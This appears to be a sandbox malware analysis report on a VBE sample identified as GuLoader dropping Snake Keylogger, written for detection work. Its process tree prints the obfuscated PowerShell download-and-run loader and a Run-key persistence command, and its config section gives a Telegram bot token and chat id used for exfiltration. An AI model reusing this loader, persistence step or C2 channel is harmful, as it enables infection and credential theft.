Windows Analysis Report
4500149631.vbe

Overview

General Information

Sample name: 4500149631.vbe
Analysis ID: 1636427
MD5: 6119da96a2b2a06d8eabea4cb705bd6a
SHA1: a26c9f58d83b2c30e596c63f25899766e8b43edd
SHA256: bf2cb64d341406561b3e57567b001abda93779729e3ab51b7ef4a612ca09981c
Tags: GuLoader, vbe, user-abuse_ch

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Snake Keylogger
Yara detected Telegram RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7100 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 7148 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. 
vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. 
Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.BailDStrmoimpawBetjnHerrlAnamo DowaTun d SvaFBe.uiJubilTopkeA is( Sko$TumiETrkgfGe ltStoce angrM nia Sk bNo me prelf.aasdesqeFlinr ounVelgeAn i1Konk7F tu4,ane,Jagt$ CoeA verssmilp rkua olcPor,eSmre)';$Aspace=$Annuloid;Testvrktjer (Uprouse15 'Delm$.arigbioglrgfaoindsbVerdAUptolfris:ListISprinOb,ltreineIncogChapRForsiXyl o.seluBegySUnau=Skre( StaTovere arksAtteT Sne-IciepVergaTeleTRu mH Scl Cadi$BunkAFagls GonPSnigA.algCTeareTran)');while (!$Integrious) {Testvrktjer (Uprouse15 'R in$BortgkartlordboShitbFro,aInfrlSnor:SnadGTin,uSkaldPro eOnentU barKultoShut1Ster4Mame6Ort =Vacu$Lio.PGummh redosektr No,oZeekn SnooYdermBomhiBal,c hows') ;Testvrktjer $Saaede;Testvrktjer (Uprouse15 'H lb[ CenTKorrhPolyR CabeBe.oaHal,dEquiIAtolnSpurgKse ..rest SkyHHyporMonoEBureaNo aDArte]Incl:Se u:StraSho,il VekeIndbEIndipArch( War4Meni0 sek0Lope0 Idi)');Testvrktjer (Uprouse15 'Hulh$ N ng,tatlRealOSi.dBSaggADisslTrre:DykkiCoroNDiplt AsteAglyGFrolRSandIKameOCounu SpiSPale= Amp(KariT j sEMul sUnneTGoka-Landp FlsaUnd T BrahP ra Haan$SeceASk.lS Ba pStata,kylCBe,geA.to)') ;Testvrktjer (Uprouse15 'Kurs$AbsogSweeLRaasOMartB.esiAmo kLOpta:CursRD,ssoHa dtRootTVagaEFalsGrespiKlveffelttOverE TonnOve.ETord=duom$BogeGLandLpulvoAeroB idsaLa nLfron:Re,dSNiloYRaasNLignG IndEFejlPVaevIAn egS ureoverrSc n+ ede+ Ber%Undi$Tavss uglpklogI An,SSemiEPeripA phLRe.nI KlogTaktt Pre1 Ef 5Wa e.VeloCChrooBrocUD.bbnUnvaT') ;$Efterabelserne174=$Spisepligt15[$Rottegiftene]}$Desperance=320598;$Possessionate=30572;Testvrktjer (Uprouse15 ' Pim$Be kGSkrilasc,oDiktBFe ta AntLPoli: cutGadgaRFormIDe ebLikeBPoliEirreN De Lact=Daar ConsGHejsETestTBort- 
Ko CRageoConcntillTFenmeUb,gnTrumTGazu Kath$ LobaQv xs ryppFlgeaM,rbCOvere');Testvrktjer (Uprouse15 'Nitr$Destg jrkl ForoUnweb,lolaUngdlYem : SkiIKinds V,noTr.ll Fora imut usiOffhoStrenOrarsperimOmlaaDec tC roe oidrKoumiFai a Mi,lStudegescsDapa Rep=Brem Sa i[LektSKlimyS.uesSyv tPro erelemK,ma.ManiCStano R bnStrevC.joe AmerHovetFinl] Aut:vaud:,edeFExcirThi oAlphmSa,eBwaleaUafvs TrueHydr6 k d4BortS S,mtBeharluf,iAn inU,cogAbbe( ges$,ontG nder KiniUdmab hoob A,se An.n Noe)');Testvrktjer (Uprouse15 'Fril$FumlG TablHju oF,isbDi eaba,bLputa:Und.kParaUVranRRobosVidtgMagieDa,evBandIFau nGhe sSkaatKlu, rak=Ki.s I.ht[AficS.oolyS,olsLiecTBegreCellmOuts.Hgtnt RegEWallx R atRess.SetiE P.pNPregcBa,lo eruD tuIGstensvinG Sur]che : atl:ParaA TytsS,naC VrvI Kk IB.li.O cngBlobeRektTNarrS FortUnefrGladi ja,nTraeGF lk(.eal$Co sI Ud s EcoO SpiLStataS.osTSprjI .deoVinrnOverS Ub.mToppa NastRensEKoprRKeveiRejoa S,oLInd,eBortsKorr)');Testvrktjer (Uprouse15 ' is$ConfgOpvaLPro o elB kofAFl.plPseu:AsseH.egeA acv Ko EOpsaMCursnKar dPent=Tros$Intek C,iuq erR IciSSquagTopsEForfvsherI aafnS irs,ntat P.r.coloSOv,ruHeptBpaceSTristAr.eRTil,I RelN Ta gLe t(T it$UneqDTortEU deStalePPuppe UngRL reaMoltNVolaC aueKopp,Ri e$ Pi,pUntioAfgaS ForSOmdeE ,heS cals.bsoI St.O utinImmoa.errT issEDr,l)');Testvrktjer $Havemnd;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 2032 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. 
vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. 
Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.BailDStrmoimpawBetjnHerrlAnamo DowaTun d SvaFBe.uiJubilTopkeA is( Sko$TumiETrkgfGe ltStoce angrM nia Sk bNo me prelf.aasdesqeFlinr ounVelgeAn i1Konk7F tu4,ane,Jagt$ CoeA verssmilp rkua olcPor,eSmre)';$Aspace=$Annuloid;Testvrktjer (Uprouse15 'Delm$.arigbioglrgfaoindsbVerdAUptolfris:ListISprinOb,ltreineIncogChapRForsiXyl o.seluBegySUnau=Skre( StaTovere arksAtteT Sne-IciepVergaTeleTRu mH Scl Cadi$BunkAFagls GonPSnigA.algCTeareTran)');while (!$Integrious) {Testvrktjer (Uprouse15 'R in$BortgkartlordboShitbFro,aInfrlSnor:SnadGTin,uSkaldPro eOnentU barKultoShut1Ster4Mame6Ort =Vacu$Lio.PGummh redosektr No,oZeekn SnooYdermBomhiBal,c hows') ;Testvrktjer $Saaede;Testvrktjer (Uprouse15 'H lb[ CenTKorrhPolyR CabeBe.oaHal,dEquiIAtolnSpurgKse ..rest SkyHHyporMonoEBureaNo aDArte]Incl:Se u:StraSho,il VekeIndbEIndipArch( War4Meni0 sek0Lope0 Idi)');Testvrktjer (Uprouse15 'Hulh$ N ng,tatlRealOSi.dBSaggADisslTrre:DykkiCoroNDiplt AsteAglyGFrolRSandIKameOCounu SpiSPale= Amp(KariT j sEMul sUnneTGoka-Landp FlsaUnd T BrahP ra Haan$SeceASk.lS Ba pStata,kylCBe,geA.to)') ;Testvrktjer (Uprouse15 'Kurs$AbsogSweeLRaasOMartB.esiAmo kLOpta:CursRD,ssoHa dtRootTVagaEFalsGrespiKlveffelttOverE TonnOve.ETord=duom$BogeGLandLpulvoAeroB idsaLa nLfron:Re,dSNiloYRaasNLignG IndEFejlPVaevIAn egS ureoverrSc n+ ede+ Ber%Undi$Tavss uglpklogI An,SSemiEPeripA phLRe.nI KlogTaktt Pre1 Ef 5Wa e.VeloCChrooBrocUD.bbnUnvaT') ;$Efterabelserne174=$Spisepligt15[$Rottegiftene]}$Desperance=320598;$Possessionate=30572;Testvrktjer (Uprouse15 ' Pim$Be kGSkrilasc,oDiktBFe ta AntLPoli: cutGadgaRFormIDe ebLikeBPoliEirreN De Lact=Daar ConsGHejsETestTBort- 
Ko CRageoConcntillTFenmeUb,gnTrumTGazu Kath$ LobaQv xs ryppFlgeaM,rbCOvere');Testvrktjer (Uprouse15 'Nitr$Destg jrkl ForoUnweb,lolaUngdlYem : SkiIKinds V,noTr.ll Fora imut usiOffhoStrenOrarsperimOmlaaDec tC roe oidrKoumiFai a Mi,lStudegescsDapa Rep=Brem Sa i[LektSKlimyS.uesSyv tPro erelemK,ma.ManiCStano R bnStrevC.joe AmerHovetFinl] Aut:vaud:,edeFExcirThi oAlphmSa,eBwaleaUafvs TrueHydr6 k d4BortS S,mtBeharluf,iAn inU,cogAbbe( ges$,ontG nder KiniUdmab hoob A,se An.n Noe)');Testvrktjer (Uprouse15 'Fril$FumlG TablHju oF,isbDi eaba,bLputa:Und.kParaUVranRRobosVidtgMagieDa,evBandIFau nGhe sSkaatKlu, rak=Ki.s I.ht[AficS.oolyS,olsLiecTBegreCellmOuts.Hgtnt RegEWallx R atRess.SetiE P.pNPregcBa,lo eruD tuIGstensvinG Sur]che : atl:ParaA TytsS,naC VrvI Kk IB.li.O cngBlobeRektTNarrS FortUnefrGladi ja,nTraeGF lk(.eal$Co sI Ud s EcoO SpiLStataS.osTSprjI .deoVinrnOverS Ub.mToppa NastRensEKoprRKeveiRejoa S,oLInd,eBortsKorr)');Testvrktjer (Uprouse15 ' is$ConfgOpvaLPro o elB kofAFl.plPseu:AsseH.egeA acv Ko EOpsaMCursnKar dPent=Tros$Intek C,iuq erR IciSSquagTopsEForfvsherI aafnS irs,ntat P.r.coloSOv,ruHeptBpaceSTristAr.eRTil,I RelN Ta gLe t(T it$UneqDTortEU deStalePPuppe UngRL reaMoltNVolaC aueKopp,Ri e$ Pi,pUntioAfgaS ForSOmdeE ,heS cals.bsoI St.O utinImmoa.errT issEDr,l)');Testvrktjer $Havemnd;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 1644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5216 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 5296 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 5968 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • svchost.exe (PID: 7016 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8", "Chat_id": "1503224244", "Version": "4.4"}
Source | Rule | Description | Author | Strings
0000000F.00000002.2232887715.0000000022BFA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
0000000F.00000002.2230198077.0000000020CBB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000006.00000002.1618891964.00000000081F0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000006.00000002.1602163136.000000000545A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
Source | Rule | Description | Author | Strings
amsi64_6564.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi32_2032.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (string matches listed below)
  • 0xc2f1:$b2: ::FromBase64String(
  • 0xb384:$s1: -join
  • 0x4b30:$s4: +=
  • 0x4bf2:$s4: +=
  • 0x8e19:$s4: +=
  • 0xaf36:$s4: +=
  • 0xb220:$s4: +=
  • 0xb366:$s4: +=
  • 0x15488:$s4: +=
  • 0x15508:$s4: +=
  • 0x155ce:$s4: +=
  • 0x1564e:$s4: +=
  • 0x15824:$s4: +=
  • 0x158a8:$s4: +=
  • 0xbb94:$e4: Get-WmiObject
  • 0xbd83:$e4: Get-Process
  • 0xbddb:$e4: Start-Process
  • 0x160e8:$e4: Get-Process

              System Summary

Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe", ProcessId: 7100, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5968, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Litteraturlistes
Source: Process started, Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5296, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)", ProcessId: 5968, ProcessName: reg.exe
Source: Network Connection, Author: frack113: Data: DestinationIp: 185.159.153.17, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5216, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49694
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5216, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Litteraturlistes" /t REG_EXPAND_SZ /d "%Hochelaga% -windowstyle 1 $Saltires=(gi 'HKCU:\Software\Wormseeds\').GetValue('Engangsforeteelsens184');%Hochelaga% ($Saltires)", ProcessId: 5296, ProcessName: cmd.exe
Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\4500149631.vbe", ProcessId: 7100, ProcessName: wscript.exe
